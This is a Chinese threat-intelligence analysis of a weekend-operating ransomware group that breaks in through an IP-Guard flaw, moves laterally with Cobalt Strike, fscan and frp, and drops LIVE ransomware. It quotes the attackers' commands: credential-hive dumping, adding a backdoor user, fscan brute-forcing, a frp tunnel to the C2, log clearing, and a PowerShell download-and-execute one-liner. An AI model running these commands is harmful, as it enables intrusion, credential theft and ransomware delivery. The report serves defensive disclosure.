概述
奇安信威胁情报中心观察到一伙较为勤奋的勒索运营商,工作时间主要在周末,可以在物理上绕过安全人员对告警的发现。周六的时候使用一些Nday漏洞进行入侵,全天无休的进行内网信息收集,控制机器数量评估,并在周日晚上控制木马批量投递勒索软件,为了给第二天要上班的受害者一个“惊喜”,攻击者在横向移动所使用的工具主要有Cobalt Strike、fscan、frp、勒索投递包等,攻击手法与护网期间的国内红队有着很高的相似性。
文章最后我们就自己的数据视野来分析IP-Guard漏洞相关活动的整个时间线,揭露了当前高强度的攻防对抗状态。
典型渗透攻击过程回顾。
攻击者使用IP-Guard漏洞上传webshell后开始收集本机信息,使用webshell执行如下命令:
net user
tasklist
dir
save hklm\system system.zip
save hklm\SAM
net1 user audit Aa123456 /add
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
攻击者第一步收集本机信息、获取账户密码hash、添加用户并尝试RDP远程登录。接着在%UserProfile%目录下投递名为b.exe的Cobalt Strike木马,启动后将shellcode注入到lsass.exe进程中,C2:38.46.8.218:55324,使用CS在相同目录下投递如下文件,攻击者在投递这些工具时被天擎报毒查杀,由于周末无人观察告警信息导致攻击者很快更换了一批免杀的工具继续“工作”。基本的活动操作如下:
fscan64.exe 扫描器
adduser.exe 添加用户
f.exe Frp
启动fscan开始对同一C段的服务器进行爆破,所用密码为抓取的服务器明文密码和ntml hash,爆破类型涉及RDP、SSH、SMB、MSSQL等。
fscan64.exe -silent -h 10.XX.X.X/16 -pa 3389 -o 16.txt -pwda XXXX
fscan64.exe -silent -h 10.XX.X.X/24 -m ssh -no -pwda XXXX
fscan64.exe -h 10.XX.X.X/24 -m mssql -pwd XXXXX -o mssql.txt -silent
fscan64 -h 10.XX.X.X/24 -m smb2 -hash XXXX7119 -username administrator
启动frp开启反向代理。
f.exe -t 38.46.8.218 -p 7000
最后清除系统的ps日志。
wevtutil cl "Windows PowerShell"
攻击者经过爆破发现已经掌握的明文密码和hash已经可以登录同C段的十几台机器,最终在周日晚上选择使用Cobalt Strike批量下发勒索投递包windows_encryptor_471820908140_self_contained.exe,内容为SFX自解压文件执行后会在%UserProfile%目录下释放名为systime.exe的LIVE家族勒索加密程序。
使用的Cobalt Strike的IP反查挂有域名(yangaoqing.com),攻击者在入侵前疑似更换了解析的IP。
2023-01-17~2023-10-09 39.97.108.148(北京阿里云)
2023-10-09~2024-01-18 38.46.8.218(美国)
IP-Guard漏洞的隐密时间线
在奇安信威胁情报的数据视野中最早于2023年9月份就已经看到了IP-Guard的漏洞大规模的测试,多个重要政企受到了入侵,攻击者只执行了whoami命令,当时的研判结论是安全研究员发现了一个0day并进行测试,接着在11月08号友商通过漏洞奖励计划发布该漏洞通报后(未提供POC),11月9日我们就观察到有黑产在使用IP-Guard漏洞进行批量Web攻击,对应命令行如下:
powershell -executionpolicybypass -noprofile -windowstylehidden (new-object system.net.webclient).downloadfile('http://154.12.57.238:7845/svdcx.exe','svdcx.exe');start-process svdcx.exe"
这波攻击者投递的是ghost、灰鸽子等类型的国产木马,并不适合横向移动,所以这波攻击并没有造成直接的破坏性危害,攻击持续到11月末,接着友商电信安全发布Mallox勒索报告,文中提到勒索团伙利用IP-Guard漏洞的时间在12月1号。
上述现象并不是个例,威胁情报中心观察到有多个Web漏洞在安全通告发布后马上就能检测到相应的在野攻击,间隔这么短无非只有两种可能:1、黑产自己通过分析补丁很快找到漏洞所在并加以利用;2、安全研究员通过赏金计划上报当时未公开所知的漏洞,然后立即又卖给了黑产,这种可能性也无法排除。
IOC
38.46.8.218:55324
38.46.8.218:7000
yangaoqing.com
参考链接:https://mp.weixin.qq.com/s/XV0x10YV-Wrs1ZI6tNHjLA
图片来源网络目标可联系删除